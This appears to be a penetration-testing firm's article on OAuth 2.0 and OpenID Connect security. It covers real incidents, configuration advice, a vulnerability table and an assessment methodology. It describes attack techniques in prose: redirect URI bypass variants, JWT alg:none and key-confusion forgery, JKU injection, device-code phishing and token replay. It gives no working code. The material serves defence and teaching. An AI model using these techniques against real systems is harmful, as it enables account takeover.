OAuth and OIDC vulnerabilities are not limited to small or poorly-maintained applications. Some of the most significant security incidents in major technology platforms have involved OAuth flaws. These examples illustrate the real-world impact of the vulnerability classes discussed in this article.
Facebook: OAuth Redirect URI Bypass Leading to Account Takeover (2013-2020, multiple instances)
Facebook's OAuth implementation has been a repeated target for security researchers. In 2013, researcher Nir Goldshlager discovered a series of redirect URI bypasses in Facebook's OAuth flow. By chaining open redirects on facebook.com subdomains with the OAuth authorization endpoint, he was able to steal access tokens for any Facebook user who clicked a malicious link. The attack chain leveraged the fact that Facebook allowed redirect URIs to any facebook.com subdomain, and several of these subdomains had open redirect vulnerabilities.
In subsequent years, multiple researchers found similar bypasses, including one in 2020 that leveraged a redirect URI validation flaw in combination with a dangling CNAME for a Facebook subdomain. Facebook paid significant bug bounties for these findings, but the pattern illustrates how difficult it is to get redirect URI validation right, even for organizations with world-class security teams.
Microsoft: Azure AD/Entra ID OAuth Misconfigurations
Microsoft's Entra ID (formerly Azure Active Directory) has been the subject of several high-profile OAuth security findings. In 2019, researchers from CyberArk demonstrated that misconfigured multi-tenant applications in Azure AD could be used to access other tenants' data by exploiting the consent framework. The attack involved registering a malicious application in one tenant, configuring it as multi-tenant, and tricking users in other tenants into granting consent. Because Azure AD's default settings allowed users to consent to applications requesting basic permissions, the attack could be executed without any administrator involvement.
In 2021, the "nOAuth" vulnerability demonstrated how a common misconfiguration in Azure AD OIDC integrations could lead to account takeover. Many applications used the email claim from Azure AD ID tokens as the unique identifier for users. However, Azure AD allows users to set arbitrary email addresses in their profile, and does not guarantee that the email claim has been verified. An attacker could set their Azure AD profile email to the victim's email address, authenticate to the target application via OIDC, and the application would match them to the victim's account based on the email claim. Microsoft's guidance was updated to recommend using the sub (subject) claim or oid (object ID) as the user identifier, as these are immutable and unique.
Slack: OAuth Token Leakage via Referer Headers (2019)
Security researcher Evan Custodio discovered that Slack's OAuth implementation leaked access tokens through referrer headers. When a user completed the OAuth flow for a Slack application, the callback page included third-party tracking scripts. The full callback URL, including the authorization code, was sent to these third-party servers via the Referer header. While the authorization codes were short-lived, the timing window was sufficient for automated exploitation. Slack fixed the issue by implementing Referrer-Policy: no-referrer on their callback pages and switching to response_mode=form_post.
GitHub: OAuth State Parameter Bypass (2012)
In one of the earliest and most impactful OAuth CSRF attacks, researcher Egor Homakov demonstrated a login CSRF vulnerability in GitHub's OAuth implementation. GitHub's "Sign in with GitHub" flow for third-party applications did not validate the state parameter. Homakov was able to force other users to link their GitHub accounts to his third-party application, giving him access to their private repositories. This finding led to widespread awareness of the state parameter's importance and prompted many OAuth libraries to include state validation by default.
Google: OAuth Scope Escalation in Google Apps Script
In 2017, a sophisticated phishing attack leveraged Google's OAuth consent flow to trick users into granting a malicious application full access to their Gmail accounts. The attack used a legitimate-looking application named "Google Docs" that requested the https://mail.google.com/ scope, which grants complete access to the user's Gmail. The consent screen showed the request was from "Google Docs" (a name the attacker chose, not the official Google application), and many users approved it without reading the scope details. This attack demonstrated that consent screens alone are insufficient to prevent scope-based attacks when users are conditioned to click "Allow" without reading the fine print.
Various Bug Bounty Programs: JWT alg:none in Production
The alg:none JWT vulnerability has been reported in bug bounty programs for numerous major organizations. In 2020, a researcher discovered that a major financial institution's API gateway accepted JWTs with alg:none, allowing them to forge tokens as any user, including administrators. The root cause was that the API gateway used an outdated JWT library that accepted unsigned tokens by default. In another case, a healthcare platform's API accepted alg:none tokens, enabling access to patient medical records. These findings consistently receive critical severity ratings in bug bounty programs.
Lessons From the Real World
Several patterns emerge from these real-world examples:
- The vulnerability is almost never in the specification itself. OAuth 2.0 and OIDC, when implemented according to current best practices (RFC 9700), are secure protocols. The vulnerabilities are in the implementations -- incomplete validation, missing parameters, insecure defaults, and configuration errors.
- Major technology companies are not immune. Facebook, Google, Microsoft, Slack, and GitHub -- organizations with some of the largest and most experienced security teams in the world -- have all had OAuth vulnerabilities. If these organizations get it wrong, smaller development teams are even more likely to have issues.
- Chaining is common. Many OAuth exploits involve chaining multiple lower-severity vulnerabilities. An open redirect (typically rated low severity) combined with a redirect URI validation flaw becomes a critical account takeover. An XSS vulnerability combined with token storage in
localStoragebecomes complete session compromise. When assessing OAuth security, it is essential to consider how individual findings can be chained. - The impact is consistently high. OAuth vulnerabilities almost always lead to account takeover or unauthorized data access. Because OAuth controls authentication and authorization, any flaw in its implementation directly compromises the application's core security boundary.
How Organizations Should Configure OAuth 2.0 and OpenID Connect
Based on our penetration testing experience and the current security best practices defined in RFC 9700 (OAuth 2.0 Security Best Current Practice) and the OpenID Connect specifications, here are the concrete steps organizations should take to secure their OAuth/OIDC implementations.
Authorization Server Configuration
- Enforce exact redirect URI matching. Do not allow prefix matching, wildcard patterns, or subdomain matching. Every redirect URI must be registered exactly as it will be used, including the scheme, host, port, and path. Query parameters should not be allowed in registered redirect URIs.
- Require PKCE for all clients. Configure the authorization server to require a
code_challengeparameter on all authorization requests and acode_verifieron all token exchange requests. Reject requests that do not include PKCE parameters. Only accept theS256challenge method; do not accept theplainmethod. - Disable the implicit flow. Remove
response_type=tokenand any hybrid response types that return tokens in the front channel. Only allowresponse_type=code. - Enforce the
stateparameter. Reject authorization requests that do not include astateparameter. While the authorization server cannot validate the state value (only the client can), requiring its presence prevents the most common implementation error of omitting it entirely. - Issue short-lived authorization codes. Authorization codes should expire within 30-60 seconds and be single-use. After an authorization code is exchanged, it must be invalidated immediately. If an authorization code is presented a second time, revoke all tokens issued from that code.
- Issue short-lived access tokens. Access tokens should have a lifetime of 5-15 minutes for high-security applications and no more than 1 hour for standard applications. Use refresh tokens (with rotation) for longer sessions.
- Implement refresh token rotation. When a refresh token is used, issue a new refresh token and invalidate the old one. If an old refresh token is presented, assume it has been stolen and revoke all tokens in the grant.
- Bind tokens to clients. Access tokens should include the
client_idof the client they were issued to, and resource servers should validate that the token's client matches the expected client. - Use
response_mode=form_postwhere possible. This delivers the authorization code via an HTTP POST body instead of the query string, mitigating referrer header leakage and browser history leakage.
Client Application Configuration
- Validate the
stateparameter on every callback. Generate a cryptographically random state value, store it in the server-side session or an HTTP-only cookie, include it in the authorization request, and verify it matches on the callback. Reject the callback if the state does not match or is missing. - Implement PKCE. Generate a new
code_verifierfor every authorization request. Store it in the server-side session. Include the correspondingcode_challengein the authorization request and thecode_verifierin the token exchange. - Store tokens securely. Use HTTP-only, secure, same-site cookies for browser-based applications. For server-side applications, store tokens in an encrypted server-side session store. Never store tokens in
localStorage,sessionStorage, or non-HTTP-only cookies. - Clean up the URL after the callback. After exchanging the authorization code, redirect the user to a clean URL using a server-side redirect (302) or
history.replaceState(). This removes the authorization code from the browser's address bar and history. - Set
Referrer-Policy: no-referreron the callback page. This prevents the authorization code from leaking to third-party servers via referrer headers. Better yet, set this policy site-wide. - Validate all JWT claims. When verifying JWTs (ID tokens, access tokens), validate all of the following: signature (using a pre-configured key, not the key from the token header), algorithm (enforce expected algorithm, reject unexpected algorithms), issuer (
iss), audience (aud), expiration (exp), and issued-at (iat). - Use a well-maintained JWT library. Do not implement JWT parsing and validation manually. Use a library that is actively maintained, has a strong security track record, and defaults to secure behavior. Configure the library to accept only the expected algorithm and reject
alg:none.
Resource Server (API) Configuration
- Validate token scopes on every request. Each API endpoint should verify that the access token's scope is sufficient for the requested operation. Do not accept any valid token for any endpoint.
- Validate the audience claim. The resource server should verify that the access token's
audclaim matches its own identifier. This prevents tokens issued for other resource servers from being accepted. - Implement token introspection for opaque tokens. If using opaque (non-JWT) access tokens, use the authorization server's token introspection endpoint (RFC 7662) to verify the token's validity, scope, and associated user. Cache introspection results for the token's remaining lifetime to avoid excessive calls to the introspection endpoint.
- Do not log tokens. Configure access logs, application logs, and error reporting to redact authorization headers and any request parameters that contain tokens. Use structured logging that allows selective redaction of sensitive fields.
Identity Provider Selection and Configuration
- Choose an identity provider that supports current best practices. The identity provider should support PKCE enforcement, exact redirect URI matching, response_mode=form_post, short-lived authorization codes, refresh token rotation, and token revocation.
- Review default settings. Many identity providers have insecure defaults (implicit flow enabled, PKCE optional, wildcard redirect URIs allowed). Review every OAuth-related setting after initial configuration.
- Restrict user consent. In enterprise environments, consider requiring administrator consent for all third-party applications. This prevents phishing attacks that trick users into granting access to malicious applications.
- Use the
subclaim for user identification. Do not use theemailclaim as the primary user identifier. Theemailclaim may not be verified, may change over time, and may not be unique across identity providers. Use thesub(subject) claim, which is guaranteed to be unique within the issuer.
Common OAuth 2.0 and OIDC Vulnerabilities: Severity, Frequency, and Impact
The following table summarizes the most common OAuth/OIDC vulnerabilities we discover during penetration testing engagements, their typical severity ratings, how frequently we encounter them, and their potential impact.
| Vulnerability | Severity | Frequency | Impact |
|---|---|---|---|
| Redirect URI Validation Bypass | Critical | Common | Authorization code or token theft leading to full account takeover |
| Missing PKCE Enforcement | High | Very Common | Authorization code interception on public clients; defense-in-depth failure on confidential clients |
| Implicit Flow in Use | High | Common | Token exposure via browser history, referrer headers, and XSS |
| Missing or Invalid State Parameter | Medium-High | Very Common | Login CSRF, account linking CSRF, session fixation |
JWT alg:none Accepted |
Critical | Uncommon | Complete token forgery; impersonate any user including administrators |
| JWT RSA/HMAC Key Confusion | Critical | Uncommon | Complete token forgery using publicly available key material |
| JWT Signature Not Verified | Critical | Rare | Complete token forgery; arbitrary claim modification |
| Tokens in localStorage | Medium | Very Common | Token theft via XSS; escalates XSS to full account takeover |
| Token Leakage via Referrer | Medium | Common | Authorization code or token exposure to third-party servers |
| Scope Not Validated by API | High | Common | Privilege escalation; access to unauthorized API operations |
| Scope Escalation via Parameter Tampering | High | Moderate | Elevated access beyond user consent; data exfiltration |
| Expired Tokens Accepted | Medium | Common | Session replay; unauthorized access using stale credentials |
| Audience Claim Not Validated | Medium-High | Common | Cross-service token replay; confused deputy attacks |
| PKCE Downgrade Attack | High | Moderate | Negates PKCE protection; enables authorization code interception |
| Consent Screen Bypass | Medium-High | Moderate | Silent scope escalation; unauthorized data access without user awareness |
| JWK/JKU Header Injection | Critical | Rare | Complete token forgery via attacker-controlled verification key |
| Refresh Token Not Rotated | Medium | Common | Persistent access if refresh token is compromised; no detection mechanism |
| Client Secret Exposed | High | Moderate | Allows attacker to impersonate the client; exchange stolen authorization codes |
Several observations are worth noting from this data. The most critical vulnerabilities (alg:none, key confusion, JWK injection) are fortunately rare in modern applications because JWT libraries have improved their defaults. However, the most common vulnerabilities (missing PKCE, missing state parameter, tokens in localStorage, scope not validated) are widespread precisely because they are not dramatic failures -- they are misconfigurations and omissions that do not cause visible errors. Applications work perfectly with these issues present, and they are only discovered through security testing.
The combination of high-frequency, medium-severity vulnerabilities (like tokens in localStorage) with common but often low-priority vulnerabilities (like XSS) produces critical-impact attack chains. This is why OAuth security testing must be holistic: evaluating each component in isolation misses the compounding effect of combined vulnerabilities.
Advanced OAuth Attack Techniques Pentesters Should Know
Beyond the core vulnerability classes, several advanced attack techniques target specific aspects of OAuth/OIDC implementations. These techniques are commonly used in sophisticated penetration tests and red team engagements.
Authorization Code Injection
Authorization code injection is an attack where an attacker injects their own authorization code into a victim's OAuth flow. This is different from authorization code interception (where the attacker steals the victim's code). In an injection attack, the attacker initiates an OAuth flow, obtains their own authorization code, and then tricks the victim's browser into sending this code to the client's callback endpoint. If the client does not validate the state parameter (or if PKCE is not enforced), the client exchanges the attacker's code for the attacker's tokens and creates a session associated with the attacker's identity.
The impact depends on the application's behavior. If the application links the OAuth identity to the victim's existing session, the victim's account is now linked to the attacker's identity provider account, giving the attacker persistent access. This is a more sophisticated version of the CSRF attack described in the state parameter section, and it specifically targets applications where OAuth is used for account linking rather than primary authentication.
Token Replay Across Services
In microservice architectures, a single authorization server often issues tokens used by multiple resource servers. If the aud (audience) claim is not validated by individual resource servers, a token obtained from one service can be replayed against another. For example, an employee with access to the "reporting" service can take their access token and use it to call the "admin" service if both services trust tokens from the same authorization server and neither validates the audience.
This attack is particularly effective in Kubernetes environments where service-to-service authentication uses JWTs from a common issuer. We have demonstrated this attack in multiple engagements by intercepting a JWT from a low-privilege service and replaying it against high-privilege API endpoints.
ID Token Reuse and Replay
OIDC ID tokens are intended for authentication -- verifying the user's identity at the time of login. They are not access tokens and should not be used for authorization. However, many applications use ID tokens as bearer tokens for API access, sending them in the Authorization header with each request. This creates several problems: ID tokens may have longer lifetimes than appropriate for API access, they may not include scope or permission claims, and they are not designed to be presented to resource servers (the aud claim in an ID token is the client application, not the resource server).
When ID tokens are used as access tokens, an attacker who obtains an ID token (through any of the leakage vectors described earlier) can replay it against the API for the token's entire lifetime.
Device Authorization Flow Abuse
The OAuth 2.0 Device Authorization Grant (RFC 8628) is designed for devices with limited input capabilities (smart TVs, IoT devices). The flow presents a user code that the user enters on a different device. Phishing attacks abuse this flow by presenting the user code in a social engineering context: the attacker initiates a device authorization flow, receives the user code, and sends it to the victim via email or chat with a message like "Enter this code to verify your identity." The victim enters the code, authorizes the attacker's device, and the attacker receives tokens for the victim's account.
This attack is particularly effective against Microsoft Entra ID and has been used in real-world phishing campaigns targeting enterprise organizations. The defense is to restrict the device authorization flow to clients that actually need it and to educate users about the risk of entering device codes from unsolicited messages.
Race Conditions in Token Exchange
Some authorization servers have race conditions in their token exchange endpoints. If two simultaneous requests present the same authorization code, both may succeed and return valid tokens before the server marks the code as used. An attacker who can replay the authorization code within a narrow timing window (typically milliseconds) can obtain their own set of tokens from the same authorization code. This is a difficult attack to execute in practice but is testable by sending concurrent requests from a penetration testing tool.
A Penetration Tester's Methodology for OAuth/OIDC Assessment
When we assess OAuth/OIDC implementations during a web application penetration test, we follow a systematic methodology that covers every vulnerability class discussed in this article. This section outlines our approach for security teams looking to conduct their own assessments.
Phase 1: Reconnaissance and Flow Mapping
Before testing for vulnerabilities, we map the entire OAuth flow by intercepting every request and response using Burp Suite or a similar proxy. The key information we gather includes:
- The authorization endpoint URL and supported parameters
- The
response_typein use (code, token, id_token, or hybrid) - Whether PKCE parameters (
code_challenge,code_challenge_method) are present - Whether the
stateparameter is present and appears random - The registered
redirect_urivalues - The requested
scopevalues - The token endpoint URL and authentication method (client_secret_post, client_secret_basic, private_key_jwt)
- The token format (JWT or opaque)
- Where tokens are stored on the client (cookies, localStorage, sessionStorage, memory)
- The OIDC discovery endpoint (
/.well-known/openid-configuration) and JWKS endpoint (/.well-known/jwks.json)
Phase 2: Redirect URI Testing
We systematically test the redirect URI validation by modifying the redirect_uri parameter in the authorization request:
- Change the path (e.g.,
/callbackto/callback/evil) - Add subdomains (e.g.,
evil.app.example.com) - Change the scheme (e.g.,
httpstohttp) - Add a different port
- Use URL encoding for path components
- Test userinfo component (
https://[email protected]) - Test with backslashes, fragments, null bytes, and Unicode characters
- Identify open redirects on the application domain and chain them
- Test with
localhostand127.0.0.1 - Remove the redirect_uri parameter entirely to see if the server uses a default
Phase 3: Token Security Testing
For JWT tokens, we perform the full suite of JWT attacks:
- Test
alg:nonewith multiple capitalizations - Test RSA/HMAC key confusion using the public key from the JWKS endpoint
- Test JWK injection (embedding our key in the token header)
- Test JKU/X5U manipulation (pointing to our controlled JWKS endpoint)
- Modify claims (sub, role, email, permissions) and verify if the server detects tampering
- Test with expired tokens
- Test with tokens intended for a different audience
- Test with completely invalid signatures
- Test with stripped signatures (two-part token)
For token storage, we inspect the browser's developer tools to determine where tokens are stored and verify the security attributes of cookies (HttpOnly, Secure, SameSite).
Phase 4: Flow Integrity Testing
We test the integrity of the OAuth flow itself:
- Remove the
stateparameter and verify the callback is rejected - Modify the
stateparameter and verify the callback is rejected - Remove PKCE parameters and verify the authorization request is rejected
- Test authorization code reuse (submit the same code twice)
- Test scope escalation by adding additional scopes to the authorization request
- Test the consent screen bypass with
prompt=none - Test the device authorization flow if available
- Test refresh token rotation by using the same refresh token twice
Phase 5: API-Level Token Validation
At the resource server level, we verify:
- Scope enforcement on every API endpoint
- Audience validation
- Token revocation effectiveness (does the API reject tokens after a logout or password change?)
- Cross-service token replay (using a token from one service against another)
Conclusion
OAuth 2.0 and OpenID Connect are the foundation of modern authentication and authorization. When implemented correctly, they provide a secure, flexible, and user-friendly framework for delegated access. When implemented incorrectly -- which, based on our penetration testing experience, is the majority of the time -- they create vulnerabilities that directly lead to account takeover, unauthorized data access, and privilege escalation.
The core message of this guide is that OAuth security is not about following a single best practice. It is about getting every detail right simultaneously: exact redirect URI matching, mandatory PKCE, validated state parameters, proper JWT verification, secure token storage, scope enforcement at the API level, and defense-in-depth at every step. A single missed control is often all an attacker needs.
The OAuth 2.0 Security Best Current Practice (RFC 9700) consolidates years of security research into a single, actionable document. If your OAuth implementation was built before this document existed, it almost certainly has vulnerabilities that need to be addressed. If it was built after, it may still have issues if the developers did not follow every recommendation.
Automated scanning tools detect some OAuth vulnerabilities -- they can identify the use of the implicit flow, missing Referrer-Policy headers, and tokens in localStorage. But they cannot test redirect URI bypass chains, consent screen manipulation, JWT key confusion attacks, scope escalation via parameter tampering, or the many subtle interaction effects between OAuth components. These require manual penetration testing by security professionals who understand the protocol deeply.
If your application uses OAuth 2.0 or OpenID Connect -- and it almost certainly does -- a dedicated authentication and authorization security assessment is not optional. It is the minimum standard of care for protecting your users' accounts and data.
Secure Your OAuth Implementation
Lorikeet Security's web application penetration tests include deep authentication and authorization testing -- including OAuth/OIDC flow analysis, token security validation, and consent bypass testing.